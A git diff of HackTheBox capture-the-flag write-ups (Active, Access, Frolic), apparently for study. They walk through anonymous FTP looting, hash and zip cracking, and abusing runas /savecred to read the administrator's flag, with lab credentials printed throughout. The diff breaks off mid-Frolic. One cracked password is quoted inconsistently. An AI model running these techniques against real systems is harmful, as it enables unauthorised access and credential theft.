3e41dfb964c5f80e88ebb6c04cbe6299ef0f5cab31e8e75278474633d33251029cf0cdd2c40fe4678581ecdd193b7eac40
+
+
+
+now we have a ticket for the admin user ! we just need to run john in combination with rockyou.txt to find the password.
+
+
+ john -w=rockyou.txt HASH.txt
+ Using default input encoding: UTF-8
+ Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
+ Will run 2 OpenMP threads
+ Press 'q' or Ctrl-C to abort, almost any other key for status
+
+ **Ticketmaster1968 (?)**
+
+ 1g 0:00:00:39 DONE (2019-11-28 13:34) 0.02515g/s 265093p/s 265093c/s 265093C/s Tiffani1432..Tiago_18
+ Use the "--show" option to display all of the cracked passwords reliably
+ Session completed
+
+
+
+Now we have the Administrator password ! Let's try to login using our newly acquired credentials : **Administrator:Ticketmaster1986**
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → smbclient -U administrator //10.10.10.100/Users
+ Unable to initialize messaging context
+ smbclient: Can't load /etc/samba/smb.conf - run testparm to debug it
+ Enter WORKGROUP\administrator's password:
+ Try "help" to get a list of possible commands.
+ smb: \> ls
+ . DR 0 Sat Jul 21 16:39:20 2018
+ .. DR 0 Sat Jul 21 16:39:20 2018
+ Administrator D 0 Mon Jul 16 12:14:21 2018
+ All Users DHS 0 Tue Jul 14 07:06:44 2009
+ Default DHR 0 Tue Jul 14 08:38:21 2009
+ Default User DHS 0 Tue Jul 14 07:06:44 2009
+ desktop.ini AHS 174 Tue Jul 14 06:57:55 2009
+ Public DR 0 Tue Jul 14 06:57:55 2009
+ SVC_TGS D 0 Sat Jul 21 17:16:32 2018
+
+ 10459647 blocks of size 4096. 4924582 blocks available
+ smb: \> cd Administrator
+ smb: \Administrator\> ls
+ . D 0 Mon Jul 16 12:14:21 2018
+ .. D 0 Mon Jul 16 12:14:21 2018
+ AppData DH 0 Mon Jul 16 12:14:15 2018
+ Application Data DHS 0 Mon Jul 16 12:14:15 2018
+ Contacts DR 0 Mon Jul 30 15:50:10 2018
+ Cookies DHS 0 Mon Jul 16 12:14:15 2018
+ Desktop DR 0 Mon Jul 30 15:50:10 2018
+ Documents DR 0 Mon Jul 30 15:50:10 2018
+ Downloads DR 0 Mon Jul 30 15:50:27 2018
+ Favorites DR 0 Mon Jul 30 15:50:10 2018
+ Links DR 0 Mon Jul 30 15:50:10 2018
+ Local Settings DHS 0 Mon Jul 16 12:14:15 2018
+ Music DR 0 Mon Jul 30 15:50:10 2018
+ My Documents DHS 0 Mon Jul 16 12:14:15 2018
+ NetHood DHS 0 Mon Jul 16 12:14:15 2018
+ NTUSER.DAT AHS 524288 Mon Jul 30 19:21:29 2018
+ ntuser.dat.LOG1 AHS 262144 Thu Nov 28 11:26:05 2019
+ ntuser.dat.LOG2 AHS 0 Mon Jul 16 12:14:09 2018
+ NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf AHS 65536 Mon Jul 16 12:14:15 2018
+ NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms AHS 524288 Mon Jul 16 12:14:15 2018
+ NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms AHS 524288 Mon Jul 16 12:14:15 2018
+ ntuser.ini HS 20 Mon Jul 16 12:14:15 2018
+ Pictures DR 0 Mon Jul 30 15:50:10 2018
+ PrintHood DHS 0 Mon Jul 16 12:14:15 2018
+ Recent DHS 0 Mon Jul 16 12:14:15 2018
+ Saved Games DR 0 Mon Jul 30 15:50:10 2018
+ Searches DR 0 Mon Jul 30 15:50:10 2018
+ SendTo DHS 0 Mon Jul 16 12:14:15 2018
+ Start Menu DHS 0 Mon Jul 16 12:14:15 2018
+ Templates DHS 0 Mon Jul 16 12:14:15 2018
+ Videos DR 0 Mon Jul 30 15:50:10 2018
+
+ 10459647 blocks of size 4096. 4924582 blocks available
+ smb: \Administrator\> cd Desktop
+ smb: \Administrator\Desktop\> ls
+ . DR 0 Mon Jul 30 15:50:10 2018
+ .. DR 0 Mon Jul 30 15:50:10 2018
+ desktop.ini AHS 282 Mon Jul 30 15:50:10 2018
+ root.txt A 34 Sat Jul 21 17:06:07 2018
+
+ 10459647 blocks of size 4096. 4924582 blocks available
+ smb: \Administrator\Desktop\> get root.txt
+ getting file \Administrator\Desktop\root.txt of size 34 as root.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
+ smb: \Administrator\Desktop\> exit
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Active] → cat root.txt
+ b5XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! The credentials gave us access to the Administrator User, and therefore we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/22.md b/Easy/22.md
new file mode 100644
index 0000000..b7ef1fb
--- /dev/null
+++ b/Easy/22.md
@@ -0,0 +1,382 @@
+# Access Writeup
+
+
+
+## Introduction :
+
+Access is an easy Windows box that was released back in September 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → nmap 10.10.10.98 -F
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 11:18 CET
+ Nmap scan report for 10.10.10.98
+ Host is up (0.086s latency).
+ Not shown: 97 filtered ports
+ PORT STATE SERVICE
+ 21/tcp open ftp
+ 23/tcp open telnet
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 2.82 seconds
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → nmap -sCV 10.10.10.98
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-03 12:30 CET
+ Nmap scan report for 10.10.10.98
+ Host is up (0.090s latency).
+ Not shown: 997 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp Microsoft ftpd
+ | ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ |_Cant get directory listing: PASV failed: 425 Cannot open data connection.
+ | ftp-syst:
+ |_ SYST: Windows_NT
+ 23/tcp open telnet?
+ 80/tcp open http Microsoft IIS httpd 7.5
+ | http-methods:
+ |_ Potentially risky methods: TRACE
+ |_http-server-header: Microsoft-IIS/7.5
+ |_http-title: MegaCorp
+ Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 192.73 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+We see that our previous nmap scan came back with the ftp port opened, which seems to allow for anonymous logins so let's connect to it and see what we can do here.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → ftp 10.10.10.98
+ Connected to 10.10.10.98.
+ 220 Microsoft FTP Service
+ Name (10.10.10.98:nihilist): anonymous
+ 331 Anonymous access allowed, send identity (e-mail name) as password.
+ Password:
+ 230 User logged in.
+ Remote system type is Windows_NT.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-23-18 08:16PM <****DIR> Backups
+ 08-24-18 09:00PM <****DIR> Engineer
+ 226 Transfer complete.
+
+We have been able to login ! now let's see what lies within the Engineer and Backups folders.
+
+
+ ftp> cd backups
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-23-18 08:16PM 5652480 backup.mdb
+ 226 Transfer complete.
+ ftp> get backup.mdb
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ cd ..
+ WARNING! 28296 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 5652480 bytes received in 10.4 seconds (531 kbytes/s)
+ ftp> cd ..
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-23-18 08:16PM <****DIR> Backups
+ 08-24-18 09:00PM <****DIR> Engineer
+ 226 Transfer complete.
+ ftp> cd Engineer
+ 250 CWD command successful.
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-24-18 12:16AM 10870 Access Control.zip
+ 226 Transfer complete.
+ ftp> get Access\ Control.zip
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ WARNING! 45 bare linefeeds received in ASCII mode
+ File may not have transferred correctly.
+ 226 Transfer complete.
+ 10870 bytes received in 0.247 seconds (43 kbytes/s)
+ ftp> ls
+ 200 PORT command successful.
+ 125 Data connection already open; Transfer starting.
+ 08-24-18 12:16AM 10870 Access Control.zip
+ 226 Transfer complete.
+ ftp> quit
+ 221 Goodbye.
+
+We have been able to download a zip file named "Access Control" and a mdb file named "Backup" let's see if we can extract the contents of the zip file using the 7z command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → 7z x Access\ Control.zip
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 10870 bytes (11 KiB)
+
+ Extracting archive: Access Control.zip
+ --
+ Path = Access Control.zip
+ Type = zip
+ Physical Size = 10870
+
+
+ Enter password (will not be echoed):
+ ERROR: Wrong password : Access Control.pst
+
+ Sub items Errors: 1
+
+ Archives with Errors: 1
+
+ Sub items Errors: 1
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → ls
+ 'Access Control.pst' 'Access Control.zip' backup.mdb
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → file backup.mdb
+ backup.mdb: Microsoft Access Database
+
+
+We use a hex editor to see that we find a suspect string, which is actually a password to work with : access4u@security
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → 7z x Access\ Control.zip -paccess4u@security
+
+ 7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
+ p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,4 CPUs Intel(R) Pentium(R) Silver N5000 CPU @ 1.10GHz (706A1),ASM,AES-NI)
+
+ Scanning the drive for archives:
+ 1 file, 10870 bytes (11 KiB)
+
+ Extracting archive: Access Control.zip
+ --
+ Path = Access Control.zip
+ Type = zip
+ Physical Size = 10870
+
+ Everything is Ok
+
+ Size: 271360
+ Compressed: 10870
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → ls
+ 'Access Control.pst' 'Access Control.zip' backup.mdb
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Access ]
+ → file Access\ Control.pst
+ Access Control.pst: Microsoft Outlook email folder (>=2003)
+
+
+
+it worked ! now we have a new file to work with : Access Control.pst Which seems to be a MS Outlook email folder. We simply need to use a pst-reading tool named [readpst](https://www.five-ten-sg.com/libpst/rn01re01.html), which is basically made to extract a the .mbox file out of any .pst formatted-file. Which then in turn gives us yet another password to work with : 4Cc3ssC0ntr0ller. We now have potential credentials : security:4Cc3ssC0ntr0ller
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Access] → telnet 10.10.10.98
+ Trying 10.10.10.98...
+ Connected to 10.10.10.98.
+ Escape character is '^]'.
+ Welcome to Microsoft Telnet Service
+
+ login: security
+ password:
+
+ *===============================================================
+ Microsoft Telnet Server.
+ *===============================================================
+ C:\Users\security>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\security
+
+ 08/23/2018 10:52 PM <****DIR> .
+ 08/23/2018 10:52 PM <****DIR> ..
+ 08/24/2018 07:37 PM <****DIR> .yawcam
+ 08/21/2018 10:35 PM <****DIR> Contacts
+ 08/28/2018 06:51 AM <****DIR> Desktop
+ 08/21/2018 10:35 PM <****DIR> Documents
+ 08/21/2018 10:35 PM <****DIR> Downloads
+ 08/21/2018 10:35 PM <****DIR> Favorites
+ 08/21/2018 10:35 PM <****DIR> Links
+ 08/21/2018 10:35 PM <****DIR> Music
+ 08/21/2018 10:35 PM <****DIR> Pictures
+ 08/21/2018 10:35 PM <****DIR> Saved Games
+ 08/21/2018 10:35 PM <****DIR> Searches
+ 08/24/2018 07:39 PM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 14 Dir(s) 16,771,465,216 bytes free
+
+ C:\Users\security>
+
+and we're in ! We have been to use the aforementionned credentials when we tried to login through the telnet service on port 23.
+
+
+ C:\Users\security>cd Desktop
+
+ C:\Users\security\Desktop>type user.txt
+ ffXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+
+And that's it ! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Let's have a look around the telnet service to see what we can work with.
+
+
+ C:\Users>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users
+
+ 08/21/2018 10:31 PM <****DIR> .
+ 08/21/2018 10:31 PM <****DIR> ..
+ 08/23/2018 11:46 PM <****DIR> Administrator
+ 07/14/2009 04:57 AM <****DIR> Public
+ 08/23/2018 10:52 PM <****DIR> security
+ 0 File(s) 0 bytes
+ 5 Dir(s) 16,771,461,120 bytes free
+
+ C:\Users>cd Public
+
+ C:\Users\Public>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public
+
+ 07/14/2009 04:57 AM <****DIR> .
+ 07/14/2009 04:57 AM <****DIR> ..
+ 07/14/2009 05:06 AM <****DIR> Documents
+ 07/14/2009 04:57 AM <****DIR> Downloads
+ 07/14/2009 04:57 AM <****DIR> Music
+ 07/14/2009 04:57 AM <****DIR> Pictures
+ 07/14/2009 04:57 AM <****DIR> Videos
+ 0 File(s) 0 bytes
+ 7 Dir(s) 16,771,461,120 bytes free
+
+ C:\Users\Public>cd
+ C:\Users\Public
+
+ C:\Users\Public>dir \a
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\
+
+ File Not Found
+
+ C:\Users\Public>cd /a
+ The system cannot find the path specified.
+
+ C:\Users\Public>dir /a
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public
+
+ 07/14/2009 04:57 AM <****DIR> .
+ 07/14/2009 04:57 AM <****DIR> ..
+ 08/28/2018 06:51 AM <****DIR> Desktop
+ 07/14/2009 04:57 AM 174 desktop.ini
+ 07/14/2009 05:06 AM <****DIR> Documents
+ 07/14/2009 04:57 AM <****DIR> Downloads
+ 07/14/2009 02:34 AM <****DIR> Favorites
+ 07/14/2009 04:57 AM <****DIR> Libraries
+ 07/14/2009 04:57 AM <****DIR> Music
+ 07/14/2009 04:57 AM <****DIR> Pictures
+ 07/14/2009 04:57 AM <****DIR> Videos
+ 1 File(s) 174 bytes
+ 10 Dir(s) 16,771,461,120 bytes free
+
+ C:\Users\Public>cd Desktop
+
+ C:\Users\Public\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public\Desktop
+
+ 08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
+ 1 File(s) 1,870 bytes
+ 0 Dir(s) 16,771,461,120 bytes free
+
+Looks like we have a shortcut file we can work with, the (lnk) stands for link file.
+
+
+ C:\Users\Public\Desktop>type "ZKAccess3.5 Security System.lnk"
+ L�F�@ ��7���7���#�P/P�O� �:i�+00�/C:\R1M�:Windows��:��M�:*wWindowsV1MV�System32��:��MV�*�System32X2P�:�
+ runas.exe��:1��:1�*Yrunas.exeL-K��E�C:\Windows\System32\runas.exe#..\..\..\Windows\System32\runas.exeC:\ZKTeco\ZKAccess3.5G/user:ACCESS\Administrator /savecred "C:\ZKTeco\ZKAccess3.5\Access.exe"'C:\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico%SystemDrive%\ZKTeco\ZKAccess3.5\img\AccessNET.ico�%�
+ �wN���]N�D.��Q���`�Xaccess�_���8{E�3
+ O�j)�H���
+ )ΰ[�_���8{E�3
+ O�j)�H���
+ )ΰ[� ��1SPS�XF�L8C���&�m�e*S-1-5-21-953262931-566350628-63446256-500
+
+
+
+This looks like an attempt at creating a password backup file using the runas command.
+
+
+ C:\Users\Public\Desktop>runas /savecred /user:ACCESS\Administrator "cmd.exe /C type C:\Users\Administrator\Desktop\root.txt > C:\Users\security\Searches\out.txt"
+
+ C:\Users\Public\Desktop>type out.txt
+ The system cannot find the file specified.
+
+ C:\Users\Public\Desktop>dir
+ Volume in drive C has no label.
+ Volume Serial Number is 9C45-DBF0
+
+ Directory of C:\Users\Public\Desktop
+
+ 08/22/2018 09:18 PM 1,870 ZKAccess3.5 Security System.lnk
+ 1 File(s) 1,870 bytes
+ 0 Dir(s) 16,771,452,928 bytes free
+
+ C:\Users\Public\Desktop>cd ..
+
+ C:\Users\Public>cd ..
+
+ C:\Users>cd Security
+
+ C:\Users\security>cd Searches
+
+ C:\Users\security\Searches>type out.txt
+
+ 6eXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print out the root flag !
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
diff --git a/Easy/23.md b/Easy/23.md
new file mode 100644
index 0000000..0e6e734
--- /dev/null
+++ b/Easy/23.md
@@ -0,0 +1,802 @@
+# Frolic Writeup
+
+
+
+## Introduction :
+
+Frolic is an easy Linux box released back in October 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ → nmap -F 10.10.10.111
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 10:29 CET
+ Nmap scan report for 10.10.10.111
+ Host is up (0.062s latency).
+ Not shown: 96 closed ports
+ PORT STATE SERVICE
+ 22/tcp open ssh
+ 139/tcp open netbios-ssn
+ 445/tcp open microsoft-ds
+ 9999/tcp open abyss
+
+ Nmap done: 1 IP address (1 host up) scanned in 0.46 seconds
+
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB ]
+ →nmap -sC -sV 10.10.10.111 -p 22,139,445,9999
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-04 10:29 CET
+ Nmap scan report for 10.10.10.111
+ Host is up (0.066s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA)
+ | 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA)
+ |_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519)
+ 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+ 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
+ 9999/tcp open http nginx 1.10.3 (Ubuntu)
+ |_http-server-header: nginx/1.10.3 (Ubuntu)
+ |_http-title: Welcome to nginx!
+ Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: mean: -1h49m30s, deviation: 3h10m30s, median: 28s
+ |_nbstat: NetBIOS name: FROLIC, NetBIOS user: <****unknown>, NetBIOS MAC: <****unknown> (unknown)
+ | smb-os-discovery:
+ | OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
+ | Computer name: frolic
+ | NetBIOS computer name: FROLIC\x00
+ | Domain name: \x00
+ | FQDN: frolic
+ |_ System time: 2019-12-04T15:00:07+05:30
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-12-04T09:30:07
+ |_ start_date: N/A
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 15.21 seconds
+
+## **Part 2 : Getting User Access**
+
+Our nmap picked up a nginx service running on port 9999. Let's run the dirsearch command with the -r -e -t and -x flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → dirsearch -u http://10.10.10.111:9999/ -r -e php -t 50 -x 403
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: php | HTTP method: get | Threads: 50 | Wordlist size: 6027 | Recursion level: 1
+
+ Error Log: /home/nihilist/.dirsearch/logs/errors-19-12-05_09-16-15.log
+
+ Target: http://10.10.10.111:9999/
+
+ [09:16:16] Starting:
+ [09:16:16] 400 - 182B - /%2e%2e/google.com
+ [09:16:19] 301 - 194B - /admin -> http://10.10.10.111:9999/admin/
+ [09:16:19] 200 - 634B - /admin/
+ [09:16:19] 200 - 634B - /admin/?/login
+ [09:16:19] 200 - 634B - /admin/index.md
+ [09:16:22] 301 - 194B - /backup -> http://10.10.10.111:9999/backup/
+ [09:16:22] 200 - 28B - /backup/
+ [09:16:24] 301 - 194B - /dev -> http://10.10.10.111:9999/dev/
+ [09:16:32] 301 - 194B - /test -> http://10.10.10.111:9999/test/
+ [09:16:32] 200 - 83KB - /test/
+ [09:16:33] Starting: admin/
+ [09:16:41] 301 - 194B - /admin/css -> http://10.10.10.111:9999/admin/css/
+ [09:16:44] 200 - 634B - /admin/index.md
+ [09:16:44] 301 - 194B - /admin/js -> http://10.10.10.111:9999/admin/js/
+ [09:16:51] Starting: backup/
+ [09:17:02] 200 - 28B - /backup/index.php
+ [09:17:04] 200 - 22B - /backup/password.txt
+ [09:17:08] 200 - 13B - /backup/user.txt
+ [09:17:09] Starting: dev/
+ [09:17:15] 301 - 194B - /dev/backup -> http://10.10.10.111:9999/dev/backup/
+ [09:17:15] 200 - 11B - /dev/backup/
+ [09:17:26] 200 - 5B - /dev/test
+ [09:17:27] Starting: test/
+ [09:17:38] 200 - 83KB - /test/index.php
+ [09:17:46] Starting: css/
+ [09:18:04] Starting: js/
+
+ Task Completed
+
+
+
+Dirsearch seems to have found the /admin/ folder.
+
+ 
+
+Looking at the sourcecode of that page, it seems to be calling the js/login.js script. So let's browse to it to see what we get. We will be using the curl command along with the -s and -k flags.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/admin/js/login.js
+ var attempt = 3; // Variable to count number of attempts.
+ // Below function Executes on click of login button.
+ function validate(){
+ var username = document.getElementById("username").value;
+ var password = document.getElementById("password").value;
+ if ( username == "admin" && password == "superduperlooperpassword_lol"){
+ alert ("Login successfully");
+ window.location = "success.html"; // Redirecting to other page.
+ return false;
+ }
+ else{
+ attempt --;// Decrementing by one.
+ alert("You have left "+attempt+" attempt;");
+ // Disabling fields after 3 attempts.
+ if( attempt == 0){
+ document.getElementById("username").disabled = true;
+ document.getElementById("password").disabled = true;
+ document.getElementById("submit").disabled = true;
+ return false;
+ }
+ }
+ }
+
+
+It seems that the javascript would redirect the user to yet another page which is success.html
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/admin/success.html
+ ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... .....
+ ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... .....
+ ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! .....
+ ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!!
+ !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... .....
+ ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?.
+ ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... .....
+ ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... .....
+ ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!!
+ !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!!
+ !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?!
+ .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?..
+ !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?.
+ ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.?
+ !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!!
+ !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!!
+ !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. .....
+ ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!!
+ !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!!
+ !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .....
+ ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! .....
+ ..!.! !!!!! !.?.
+
+
+
+browsing to it we seem to get an [Ook!](https://www.dcode.fr/ook-language) encoded string. Decoding the string seems to show up the message **"Nothing here check /asdiSIAJJ0QWE9JAS"** So we will browse to it to see what we can work with.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/
+ UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB
+ BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs
+ K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve
+ EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj
+ lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC
+ AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG
+ AAAAAAEAAQBPAAAAAwEAAAAA
+
+
+Seems like we have a base64 string here, so we will pipe it into the base64 decoding command.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d
+ PK É7M#�[�i index.phpUT �|�[�|�[ux
+ ^D�J�s�h�)�P�n
+ ��Ss�Jw��4��ُk�z��UȖ�+X��P��ᶇ��л�x_�N�[���S��8����J2S�*�DЍ}�8dTQk������j_�����'xc��ݏt��75Q�
+ ���k,4��b)�4F�� ��������&q2o;�WԜ�9P#�[�iPK É7M#�[�i ��index.phpUT�|�[ux
+ PKO%
+
+
+
+Even weirder ! It seems to have taken a binary form. so we will save it locally and check what filetype it is.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → curl -sk http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > unknown_file
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/ ]
+ → file unknown_file
+ unknown_file: Zip archive data, at least v2.0 to extract
+
+
+
+So we have a zipfile to work with ! Let's give it it's appropriate extension and try to extract it once we find it's password using fcrackzip. We will be using the rockyou.txt wordlist to see if the password of that zip file is publicly known.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → curl -sk https://www.scrapmaker.com/data/wordlists/dictionaries/rockyou.txt > rockyou.txt
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → ls -l
+ total 136648
+ -rw-r--r-- 1 nihilist users 139921497 Dec 5 09:53 rockyou.txt
+ -rw-r--r-- 1 nihilist users 360 Dec 5 09:45 zipfile.zip
+
+ λ nihilist [ 10.10.14.48/23 ] [ ~/_HTB/Frolic ]
+ → fcrackzip --help
+
+ fcrackzip version 1.0, a fast/free zip password cracker
+ written by Marc Lehmann <****pcg@goof.com> You can find more info on
+ http://www.goof.com/pcg/marc/
+
+ USAGE: fcrackzip
+ [-b|--brute-force] use brute force algorithm
+ [-D|--dictionary] use a dictionary
+ [-B|--benchmark] execute a small benchmark
+ [-c|--charset characterset] use characters from charset
+ [-h|--help] show this message
+ [--version] show the version of this program
+ [-V|--validate] sanity-check the algortihm
